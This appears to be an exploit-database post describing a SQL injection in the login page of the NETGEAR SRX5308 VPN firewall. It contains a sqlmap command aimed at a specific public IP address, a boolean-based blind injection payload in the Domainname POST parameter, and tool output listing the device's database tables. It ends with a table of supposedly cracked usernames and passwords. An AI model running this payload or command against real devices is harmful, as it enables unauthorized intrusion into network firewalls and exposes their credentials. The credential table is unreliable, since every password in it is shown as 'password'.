# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------

NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308

NETGEAR ProSafe™ - NETGEAR Configuration Manager Login

https://95.128.69.5/scgi-bin/platform.cgi

---
Parameter: USERDBDomains.Domainname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
    Vector: AND [INFERENCE]
---
  
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True

available databases [1]:                                                                                                              
[+] SQLite_masterdb

Database: SQLite_masterdb
[4 tables]
+----------+
| system   |
| logging  |
| services |
| zones    |
+----------+

passwd and shadow encryption cracked
+---------------------+
| username | password |
+----------+----------+
| showid   | password |
+----------+----------+
| guest    | password |
+----------+----------+